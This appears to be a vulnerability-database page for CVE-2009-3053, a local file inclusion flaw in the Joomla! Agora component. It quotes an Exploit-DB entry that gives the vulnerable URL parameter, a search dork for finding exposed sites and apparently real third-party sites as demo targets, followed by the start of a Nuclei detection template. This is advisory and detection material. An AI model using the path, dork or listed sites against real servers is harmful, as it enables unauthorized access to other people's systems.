CVE-2009-3053
published 2009-09-03CVE-2009-3053: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files…
PriorityP341medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
5.92%
92.3th percentile
Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jvitals | com_agora | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
exploitdb·2009-09-01
CVE-2009-3053 Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG
---------------Ooooo-------------------------
( )
ooooO ) /
( ) (_/
\ (
\_)
@~~=T¸m ›slam Aleminin Ramazan-Ë ï¬erifleri HayËrlË Olsun.
@~~=======================================~~@
@~~=Script : Joomla Component Com_Agora
@~~=S.Site : http://joomlame.com
@~~=======================================~~@
@~~=Vuln
: http://c4team.org/ [Yol] /index.php?option=com_agora&task=profile&page=avatars&action= [-LFI-]
@~~=Dork
:Powered by Agora 3.0.0b
@~~=Demo
:http://haaseit.com/index.php?option=com_agora&task=profile&page=avatars&action=
:http://fairweatherforge.com/index.php?option=com_agora&t
Nuclei
Joomla! Agora 3.0.0b - Local File Inclusion
nuclei·CVSS 6.8
CVE-2009-3053 [MEDIUM] Joomla! Agora 3.0.0b - Local File Inclusion
Joomla! Agora 3.0.0b - Local File Inclusion
Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
Template:
id: CVE-2009-3053
info:
name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: |
Apply the latest security patches or upgrad
2009-09-03
Published